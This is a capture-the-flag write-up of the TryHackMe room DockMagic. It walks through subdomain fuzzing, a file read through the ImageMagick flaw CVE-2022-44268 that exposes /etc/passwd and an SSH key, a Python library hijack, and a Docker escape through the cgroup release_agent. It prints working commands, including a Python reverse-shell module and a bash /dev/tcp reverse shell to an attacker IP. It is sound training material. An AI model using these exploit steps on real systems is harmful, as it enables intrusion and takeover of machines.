# DockMagic {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) ## Recon We start off with a Nmap scan of our target. We can discover just two open ports. We have SSH on port 22 with OpenSSH 8.4p1 and on port 80 with nginx/1.18.0, a web server.

Since only a web server is present, the first thing to do is enumerate possible directories. But running Gobuster on the IP of the machine does not give us satisfying results.

We visit the page with the IP of the machine and get redirected to `http://site.empman.thm/`. We add that to our host file and continue.

Since we now know that subdomains are used, there might be more of them. We hit up FFuF to fuzz for possible subdomains. We are able to spot two subdomains: `backup` and `site`. The subdomain backup looks promising. ```bash ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/dockmagic] └─$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://empman.thm -H "Host: FUZZ.empman.thm" ```

While Gobuster is running in the background, we move on to enumerate the web page manually, since the first 5000 entries of the wordlist does not lead to any results. ```bash ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/dockmagic] └─$ gobuster dir -u http://site.empman.thm -w /usr/share/wordlists/dirb/big.txt ```

At `backup.empman.thm` we find a zip file containing ImageMagick. ImageMagick is a free and open-source software suite for creating, editing, and converting raster and vector images. It provides a wide range of command-line tools and libraries for image manipulation and processing. Because of the room name DockMagick this might be about vulnerabilities in ImageMagick. Several vulnerabilities were present, and the first thing that came to mind was ImageTragick. But that's another tale and not part of this challenge: {% embed url="" %}

The zip contains, besides ImageMagick, a to-do list, giving us a valuable hint. There are two serious to-dos: one about revoking the user's ssh keys and the other about switching to another image processor vips instead of ImageMagick because of recent security vulnerabilities. This once again confirms our assumption that we can somehow exploit ImageMagick.

We check out the `install-unix.txt` to spot the used version. It is `ImageMagick-7.0.9`.

Next, we check out `http://site.empman.thm/`. Here, we are able to create a user with a profile picture. There might be an entry point using an ImageMagick vulnerability.

After account creation, we are able to edit or delete our account, there is nothing more to do.

## Foothold: Flag 1 For foothold, we researched several CVEs regarding ImageMagick. One worked out. `CVE-2022-44268`. This applies to versions `7.1.0–49` and below matching our found version. With that, we are able to read arbitrary files. The images are manipulated in such a way that a payload is executed when the images are processed by ImageMagick, which queries information on the target system and then saves it in the image information. This means that the avatar of our account contains useful information after uploading. {% embed url="" %}

As PoC we use the following: {% embed url="" %} We modify our profile picture on our attacker machine to retrieve the contents of `/etc/passwd`. `pngcrush -text a "profile" "/etc/passwd" tf2.png passwd.png`

Via `exiv2` we review our changes to the PNG file.

Next, we create an account with our modified profile picture. The account update functionality did not work properly, so we kept creating new accounts to retrieve valuable information.

We retrieve the profile picture from the Edit User page.

To be able to read the information, we use tool `identify`.

The information is encoded in hex.

For the sake of simplicity, we use CyberChef to decode the information. We are able to retrieve information from the target system. The machine is indeed vulnerable to `CVE-2022-44268`. We are able to spot the user `emp`.

Recalling the to-do note in the zip file about the ssh keys, we try to access the key of the user `emp`.

This time it takes a while, don't worry.

Again, we use identify on the downloaded profile picture...

And there is the ssh key encoded in hex.

We use CyberChef to decode it...

... and directly use it. We are able to log in as the user emp and find the first flag at `/home/emp/flag1.txt`.

## Privilege Escalation Part I: Flag 2 As always, on a Linux machine, we run `LinPEAS` to enumerate the target.

We spot a cronjob running `/usr/local/sbin/backup.py` with a modified PYTHONPATH variable to `/dev/shm`. Interesting.

For confirmation, we run `pspy` and see the job running.

Luckily, we have write access to `/dev/shm`.

We inspect `/usr/local/sbin/backup.py` and see that a backup process is initiated on /`home/emp/app` using the `cbackup` module.

Since we are able to write to `/dev/shm` and the module is being looked for there first, we can control exactly what module is imported.

For further reading on Python library hijacking, see the following link: {% embed url="" %} We create our own module containing a reverse shell. `vim /dev/shm/cbackup.py` {% code title="/dev/shm/cbackup.py" lineNumbers="true" %} ```python import os import pty import socket lhost = "10.11.58.51" lport = 4445 class cbackup: def close(*args): return def write(*args): return def __init__(self, *args): return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((lhost, lport)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close() ``` {% endcode %} We set up a listener on port 4445 and place our module at `/dev/shm/cbackup.py` and waited a bit. After a short duration, our reverse shell connects, and we are `root`. First things first, we upgrade our shell. We are root now, and we find the second flag in `/root/flag2.txt`.

{% embed url="" %} ## Privilege Escalation Part II: Flag 3 Again, we run `LinPEAS` and see that we are able to break out of the Docker container via mounts, see `release_agent breakout 2`. Since the Room is called DockMagick this might be the correct track.

For further Docker enumeration, the script `deepce.sh` is used. {% embed url="" %} But it just confirms that the breakout is possible via groups/ mounts.

A proof of concept is described in the following link. After running this PoC, the machine has to be restarted, because only `ps aux` which initally was placed in `/cmd` is being executed even after editing the `/cmd`. {% embed url="" %} Running the Hacktricks Poc:

Since I was only able to use the exploit and did not fully understand it - something magically is happening here - at the time of writing, I will now refer to an excellent explanation of the Docker escape here: {% embed url="" %} Instead of `ps aux`, we place a reverse shell in the cmd. ```bash mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x ls /tmp/cgrp ls /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release host_path=`sed -n 's/.*\perdir=$[^,]*$.*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent echo '#!/bin/bash' > /cmd echo "/bin/bash -i >& /dev/tcp/10.11.58.51/4443 0>&1" >> /cmd chmod a+x /cmd sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" ``` We set up a listener on 4443, and after executing `sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs".` We escaped the Docker container.

From there, we are able to spot the third flag at `/home/vagrant/flag3.txt`.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/tryhackme/2023/dockmagic.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.